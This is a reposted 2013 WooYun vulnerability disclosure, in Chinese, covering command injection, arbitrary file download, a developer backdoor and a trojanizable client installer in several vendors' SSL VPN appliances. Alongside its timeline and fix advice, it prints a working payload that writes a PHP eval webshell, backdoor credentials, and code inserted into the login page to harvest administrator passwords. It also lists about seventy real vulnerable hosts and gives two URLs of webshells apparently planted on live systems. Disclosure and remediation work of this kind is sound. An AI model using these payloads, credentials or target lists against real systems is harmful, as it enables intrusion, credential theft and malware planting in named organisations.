发新话题
打印

网御神州 网神 天融信 西安网赢 卫士通 吉大正元 凹凸 ANIX vpn设备厂商批量漏洞

网御神州 网神 天融信 西安网赢 卫士通 吉大正元 凹凸 ANIX vpn设备厂商批量漏洞

漏洞概要
缺陷编号:        WooYun-2013-24919
漏洞标题:        [浅谈内网安全]--国内外多家vpn设备厂商批量漏洞
相关厂商:        网御神州、天融信、西安网赢、卫士通、吉大正元、美国凹凸、德国 ANIX等多家VPN厂商设备
漏洞作者:        紫梦芊
提交时间:        2013-06-01 11:23
公开时间:        2013-08-30 11:24
漏洞类型:        设计不当
危害等级:        中
自评Rank:        5
漏洞状态:        已交由第三方厂商(cncert国家互联网应急中心)
处理漏洞来源:        http://www.wooyun.org
Tags标签:       远程命令执行 设计缺陷/边界绕过 任意文件下载 木马下发 数据库明文密码

漏洞详情披露状态:
2013-06-01:        细节已通知厂商并且等待厂商处理中
2013-06-03:        厂商已经确认,细节仅向厂商公开
2013-06-06:        细节向第三方安全合作伙伴开放
2013-06-13:        细节向核心白帽子及相关领域专家公开
2013-06-23:        细节向普通白帽子公开
2013-07-13:        细节向实习白帽子公开
2013-08-30:        细节向公众公开

简要描述:继之前乌云上爆出深信服大量高危漏洞后,大家就感到vpn等基础设施的安全性非常值得重视,一暴露就涉及到内网系统的安全性,毕竟这些系统的安全性大都依赖于vpn验证有效用户,现在来发些其他厂商的高危吧(据知有人手中还有新版M5.9的0day).

该漏洞涉及到包括网御神州、天融信、西安网赢、卫士通、吉大正元、美国凹凸、德国 ANIX等多家VPN厂商设备在政务、地产、运营商、政府部门、高校、企业、公安、司法、银行等行业存在的任意文件下载、远程命令执行、维护后门、三方平台帐号泄漏、恶意客户端下发等高位漏洞。

发现有些时日了,很可惜的错过了乌云众测四期(知道四期是关于vpn的时四期已经结束了,不知道这些漏洞是不是那个厂商也有的)
为了防止像深信服那种问题,建议由cncert分发给各厂商,然后3个月后公开。

详细说明:看到在北大读研的同学Ray发的信息东点西点进到了vpn.pku.edu.cn(当时还是o2的vpn,现在可以借鉴北大计算中心https://124.205.79.78/)然后尝试渗透测试,发现有个证书请求链接,点进去看可以下载东西,但是没有初始化mimiCA,于是想到同源通注,就去网上找相同代码特征的系统 很容易地找到了vpn.cnu.edu.cn/sub_ca.php





在sub_ca_action.php?id=0看到 任意文件下载





分别传入参数/etc/httpd/httpd.conf 和 httpd.conf获得apache配置 找到了web根路径为/ssl/www 于是想看看漏洞代码是如何的



然后分别传入传 /ssl/www/minica_down.php 和minica_down.php下载minica_down.php

前两行是发现


code 区域if($_POST['realfile'])
        exec("cp ".$_POST['realfile']." ".$_POST['path']."");

(感觉这些vpn设备的开发管用C和shell的思想,所以喜欢用system和exec不喜欢php内置函数)

幸好之前在淘宝实习时学过白盒 能看懂些代码 于是 有了任意命令执行


code 区域<form action="https://IP/minica_down.php" method="post">
<input name="realfile" type="hidden" value="aimee.php aimee.php || echo '<?php eval($_POST[cmd]);?>It works' >/ssl/www/aimee.php ">
<input type=hidden>
<input type=submit>
</form>

提交一个后门





用菜刀连接,获得root权限, 这还没结束。



对代码进行些审计,发现开发留的后门/ssl/www/admin/debug.php 帐号密码o2micro killbug(部分厂家已经去掉)



然后发现mysql不向外开放并且是unix的socket方式去访问的

但是可以通过

ini_set("mysql.default_socket = /var/run/mysql/mysql.sock"); 去连接

可以exec("/ssl/mysqld/mysqldump >xxx") 导出或是用exec执行sql等



然后管理员密码是sha1加密了的 于是在/ssl/www/admin/login_action.php第128行(认证成功后)加入 (初学php,别见笑)


code 区域$obj=file_get_contents("admin.json");
                $userList=json_decode($obj);
                $userList->$UserName=$UserPass;
                file_put_contents("admin.json",json_encode($userList));

钓取管理员账号密码



钓鱼后进入后台了解了下系统,发现三方LDAP、AD认证方式管理帐号密码可以在html代码中看到明文,

其次就是存储三方系统登录地址、帐号、密码用来实现SSO的子帐号也是明文,数据库中一看,证实未进行任何加密处理,至少也应该来个AES吧(一些系统没配认证方式和子帐号)



使用一次vpn后发现是web端安装插件方式安装客户端,于是尝试给客户端加点东西试试,对于dll绑恶意dll我不会(而且给dll签名没证书),只能在exe上拙劣的下手,于是到/ssl/www/download/ClientSetup.exe(app.exe.cab应该也存在问题)

下载下来,用winrar生成自解压运行的包含恶意文件和ClientSetup.exe的新ClientSetup.exe 传入到原目录替换后能够达到在内网种植木马的功效。



-------------------------------------------------------

存在漏洞的站点至少包括



美国凹凸科技(o2security)

https://vpn.bit.edu.cn/ 北京理工

https://sslvpn.bjtu.edu.cn/ 北交大

https://125.46.88.100/ 郑州大学

https://219.80.0.19/p 国泰地产集团

https://info.nai.edu.cn/ 北京国家会计学院

https://124.205.79.78/ 北大计算中心

https://210.82.53.201/ 北京联合大学

https://vpn.cnu.edu.cn/ 首都师大

https://vpn.mcut.edu.tw/ 台湾明志科技大学

https://ac.whlib.gov.cn 武汉图书馆

https://sslvpn.nhcue.edu.tw 新竹教育大学

https://isms.ydu.edu.tw/ 育達商業科技大學

https://sslvpn.ydu.edu.tw/ 育達商業科技大學

https://vpn.cute.edu.tw 中国(台湾)科技大学

https://sslvpn.ntue.edu.tw 国立台北教育大学

https://vpn.psi.com.tw 升阳国际

https://maltimur.jksm.gov.my/ 马来西亚某政府网站

https://vpn.ccom.edu.cn 中央音乐学院

https://vpn.dlmu.edu.cn 大连海事大学

https://vpn.wanfang.edu.cn 河南理工

https://vpn.genius.com.cn 深圳巨灵

https://sslvpn.changhongit.com 长虹佳华

https://vpn.jnrd.com.cn 北京京能热电

https://sslvpn.kworld.com.tw 廣寰台北辦公室

https://www.oo586.com/ 易宝支付

https://svpn.mbatec.com.tw 新碩資訊

https://sslvpn.szs.com.tw 新日兴

https://sslvpn.gzcatv.net 广数传媒

https://e.nais.net.cn 农业部农E通

https://vpn.thcic.cn 清华

https://vpn.pku.edu.cn/ 北大(已经失效)

https://vpn.cau.edu.cn/ 中国农大(已经换了)

https://sh-vpn.o2micro.com o2

https://bj-vpn.o2micro.com o2

https://cd-vpn.o2micro.com o2







天融信 网络卫士VPN系统(admin/debug.php o2micro killbug)

https://218.26.21.194/ 山西邮政VPN系统

https://218.26.7.112/ 山西检验检疫局VPN系统



联想网神-网御神州 SecSSL3600(号称国内第一的SSLVPN)

https://220.178.250.102/ 马鞍山市行政事业单位资产管理信息系统

https://vpn.hnuu.edu.cn/ 淮南联大

https://222.75.160.120/

https://60.191.18.54/

https://61.191.18.137/ 合肥市房地产市场信息系统

https://218.22.51.114/ 安徽省肥西财政局

https://183.166.187.156/ 黄山市网上房地产信息系统

https://oa.qzbsg.gov.cn 广西钦州保税港区

https://www.smfgny.com 陕西煤业化工集团

https://cbj.1203.org 残疾人就业保障金征缴管理系统

https://58.54.252.40 荆州电子政务外网

https://218.24.94.244 沈阳市经济和信息化委员会

https://219.141.234.54/ 中国渔政管理指挥系统

https://vpn.cdc.com.cn 成都普天电缆

https://58.242.162.242/

https://116.236.137.18/

https://oa.qzbsg.gov.cn/

https://122.225.14.154/

https://60.191.18.54/



西安网赢信息技术有限公司 护航者

https://125.65.179.230/ 四川省丹棱县党政综合办公平台

https://www.scxjrz.com/ 四川电信安全运营中心



德国ANIX

https://vpn.tgsh.ttct.edu.tw/ 台东女中



卫士通 中华卫士

https://ssl.qztc.com/welcome.php 泉州电信



吉大正元

https://oa.chnmuseum.cn/ 国家博物馆

https://218.62.26.250/

https://219.143.243.103/



这些里面没有minica_down的就有debug后门,没debug的就有minica_down问题 很多是都存在。

在这些厂商描述中他们在公安网 银行专网 审计署内部网络 司法专网等私网也用了这些系统保护信息安全 据我猜想如果这些私网中肯定更有很多不堪一击的系统。



所以个人认为内网安全不能仅仅去依靠防火墙 VPN IDS等设备去完成 一旦这些设备出现问题 或是被合法绕过 里面的系统如果安全性不够的话 信息泄漏是很轻易的事。

漏洞证明:









两个一句话例子

https://vpn.thcic.cn/sms_inc.php

https://218.26.21.194/sms_inc.php


修复方案:1.删除debug.php

2.minica_down.php第2和12行

exec("cp ".$_POST['realfile']." ".$_POST['path']."");改为

copy($_POST['realfile'],$_POST['path'])

exec("rm ".$_POST["path"]."");改为

unlink($_POST['path'])

3.子帐号和三方认证平台管理信息使用AES或3des加密存在数据库中 防止脱裤后的更大安全危害

4.在客户端安全加入checksum

版权声明:转载请注明来源 紫梦芊@乌云

漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-06-03 22:29
厂商回复:CNVD确认并复现所述其中三个厂商案例情况,另外四家厂商可确认产品同源,但实测未发现包含或远程执行相关结果。根据后续源代码分析,OEM为主要原因,问题根源出现在第一家厂商上。

针对测试得到的部分结果,CNVD以及CNCERT采用以下方式进行:1、CNVD向国内相关VPN设备厂商询查是否OEM目标厂商产品,并协调涉事的三家厂商先行处置;2、对于涉及的政府和重要部门,转由CNCERT协调设备管理单位处置(包含一些工业和信息化部直属高校);

最早在明天应该会有一个通信行业通报出来,向社会公众发布预警。

rank 30?40?

最新状态:暂无

原文:http://www.wooyun.org/bugs/wooyun-2013-024919

[ 本帖最后由 linda 于 2016-2-15 11:01 编辑 ]

TOP

发新话题